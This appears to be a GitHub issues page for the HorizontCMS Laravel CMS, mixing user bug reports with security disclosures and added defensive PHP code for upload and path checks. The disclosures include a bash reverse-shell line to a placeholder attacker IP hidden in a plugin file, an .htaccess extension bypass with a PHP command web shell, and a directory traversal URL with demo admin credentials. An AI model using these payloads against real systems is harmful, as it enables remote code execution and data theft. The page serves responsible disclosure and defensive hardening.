ttimot24 / horizontcms
Lightweight CMS built on Laravel 9, VueJs 2.6 and Bootstrap 5.3. An alternative platform to OctoberCMS
License: MIT License
One who is able to log into the admin panel can gain Remote Code Execution by uploading a malicious plugin file via the Plugins upload functionality.
Modifying the message.php file in the sample GoogleMaps plugin file:
<?php
$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp/<Attacker IP>/9001 0>&1'");
return [
'successfully_added_location' => $shell, //'Location added succesfully!',
'successfully_deleted_location' => 'Location deleted succesfully!',
'successfully_set_center' => 'Location is successfully set as map center!'
];
Zip and upload the GoogleMaps plugin:
$ zip -r google.zip GoogleMaps
Install --> Activate --> Google Maps Plugin is created in the menu bar:
Add location --> Click Save (to initiate the message.php code)
Please let us know if you have any questions or need further information. Thanks.
Daniel Min & Chi Tran
Under Media > Header Images I have added two pictures to the "Currently on the slider:" but encountered two issues:
Dear Ttimot24,
thank you very much for working on the CMS. I would like to see the features you have built by following your links:
Frontend: https://horizontcms.herokuapp.com/
Backend: https://horizontcms.herokuapp.com/admin
Unfortunately that leads only to an installation page, and I'm not aware of your MySQL settings...
Thank you for having a look.
The YouTube part works well with youtube.com links, but when I accidentally add a youtu.be link the whole YouTube part dies and I can only see an exception when clicking on the menu. The only way to revert this is to delete the bad link from the DB.
One who is able to log into the admin panel can gain Remote Code Execution by uploading .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter can be bypassed by uploading an arbitrary .htaccess file and *.hello files in order to execute PHP code and gain RCE.
AddType application/x-httpd-php .hello
<?php system($_GET['cmd']); ?>
Please let us know if you have any questions or need further information. Thanks!
Daniel Min & Chi Tran
The Themes upload function allows uploading a zip file and extracts its content to the /themes/ directory.
If an attacker sends a zip file containing a malicious PHP file, they can execute it via http://URL/themes/malicious.php
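The two reports above (the .htaccess / *.hello bypass of an extension denylist, and a PHP file extracted from a theme archive) share one root cause: the server trusts the names of files it stores under the web root. The following is an added defensive example, not HorizontCMS code: an allowlist check for media file names that refuses dotfiles and multi-extension names outright, plus a scan of an archive's entry list before anything is extracted. The function names, the allowlist and the sample archive are assumptions; for theme or plugin archives, which legitimately contain .blade.php files, the allowed-name predicate would differ, but the point that entries are inspected before extraction and never written outside the target directory is the same.

```php
<?php
// Added example (not HorizontCMS code): allowlist filename check for media uploads
// and a pre-extraction scan of uploaded archives. Names and allowlist are assumptions.

const ALLOWED_MEDIA_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf'];

function isSafeMediaFilename(string $name): bool
{
    // Reject anything carrying a directory component ("../x.png", "sub/x.png").
    if ($name === '' || basename(str_replace('\\', '/', $name)) !== $name) {
        return false;
    }
    // Dotfiles such as .htaccess or .user.ini reconfigure the web server: refuse
    // them regardless of extension, so no denylist of "php" extensions is relied on.
    if ($name[0] === '.') {
        return false;
    }
    // Exactly one extension, so "shell.php.jpg" and "x.hello" are both refused.
    $parts = explode('.', $name);
    if (count($parts) !== 2) {
        return false;
    }
    [$stem, $ext] = $parts;
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $stem)) {
        return false;
    }
    return in_array(strtolower($ext), ALLOWED_MEDIA_EXTENSIONS, true);
}

// Returns entry => reason for every archive entry that must not be extracted.
function unsafeArchiveEntries(string $zipPath, callable $isAllowedName): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open archive: $zipPath");
    }
    $rejected = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = $zip->getNameIndex($i);
        $path = str_replace('\\', '/', $entry);
        $segments = explode('/', $path);
        // Absolute paths or ".." segments would write outside the extraction
        // directory ("zip slip"); reject before any file is created.
        if ($path === '' || $path[0] === '/' || in_array('..', $segments, true)) {
            $rejected[$entry] = 'path escapes extraction directory';
            continue;
        }
        // Directory entries end with "/"; only file entries get the name check.
        if (substr($path, -1) !== '/' && !$isAllowedName(basename($path))) {
            $rejected[$entry] = 'disallowed filename';
        }
    }
    $zip->close();
    return $rejected;
}

// Constructed sample archive mirroring the reports: one benign image name,
// one PHP file, one .htaccess, and one traversal entry.
$tmp = tempnam(sys_get_temp_dir(), 'upload');
$zip = new ZipArchive();
$zip->open($tmp, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('GoogleMaps/logo.png', 'constructed placeholder content');
$zip->addFromString('GoogleMaps/malicious.php', '<?php // constructed placeholder');
$zip->addFromString('GoogleMaps/.htaccess', 'AddType application/x-httpd-php .hello');
$zip->addFromString('../outside.txt', 'constructed placeholder content');
$zip->close();

foreach (unsafeArchiveEntries($tmp, 'isSafeMediaFilename') as $entry => $reason) {
    echo "reject {$entry}: {$reason}\n";
}
unlink($tmp);
```

Only GoogleMaps/logo.png passes; the other three entries are reported with their reason, and an upload handler would discard the whole archive rather than extract the "good" entries. Whatever the allowlist, the extraction target should also not be a directory from which the web server executes PHP, so that a missed case is a stored file and not code execution.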
The demo is not opening. If this project is managed properly, this will be a hit in no time. I opened this project just because it says "Alternative to octobercms"
It is really hard to adjust the banner to the header, and there is no info on what the ideal header image size should be.
Please add a message/validation if I am adding big pictures for a blog post (which can mess up the page layout), or create an option where I can resize the image (manually or automatically).
Where can I find the home blade and the admin blades!!
Plugins won't show browse server.
Hey there!
I belong to an open source security research community, and a member (@dota-st) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Under Pages > Page list, when you click on the "Order" button it creates an Order column on every click. None of these added order columns are functioning, so the whole order function is not working.
The File Manager is vulnerable to directory traversal. PoC link:
http://horizontcms.herokuapp.com/admin/file-manager/index?path=/../../../../../&mode=embed&CKEditor=editor&CKEditorFuncNum=1&langCode=en
username: admin
password: admin
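The path parameter in the report above is concatenated onto the file manager's root and listed as-is. The fix a defender wants is containment: canonicalise the requested path and refuse it unless the result still lies under the root. The following is an added example, not HorizontCMS code; the function name, the sandbox directories and the sample paths are assumptions.

```php
<?php
// Added example (not HorizontCMS code): confine a user-supplied "path" parameter
// to the file manager's root before listing it. Names are assumptions.

function resolveInsideRoot(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() canonicalises "..", "." and symlinks, so a link inside the root
    // that points outside it is caught as well. Non-existent paths yield false,
    // which fails closed.
    $target = realpath($rootReal . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($target === false) {
        return null;
    }
    // Compare against the root with a trailing separator so "/var/www/media2"
    // is not accepted as lying inside "/var/www/media".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $rootReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sandbox: a media root with one subdirectory, and a sibling
// directory standing in for the rest of the filesystem.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fm-' . bin2hex(random_bytes(4));
mkdir("$base/media/uploads", 0700, true);
mkdir("$base/secrets", 0700, true);

$samples = [
    '/',                        // root itself: accepted
    '/uploads',                 // subdirectory: accepted
    '/uploads/../../secrets',   // resolves to the sibling directory: rejected
    '/../../../../../',         // the traversal from the report: rejected
    '/does-not-exist',          // realpath() fails: rejected
];
foreach ($samples as $p) {
    $resolved = resolveInsideRoot("$base/media", $p);
    printf("%-26s -> %s\n", $p, $resolved === null ? 'REJECTED' : $resolved);
}

rmdir("$base/media/uploads");
rmdir("$base/media");
rmdir("$base/secrets");
rmdir($base);
```

The check is done on the resolved path, not on the raw string, so encoded or doubled separators and "." segments are handled by the filesystem rather than by pattern matching. A listing endpoint should call this once and treat null as a 4xx response; logging rejected values gives a cheap detection signal for traversal attempts against the admin panel.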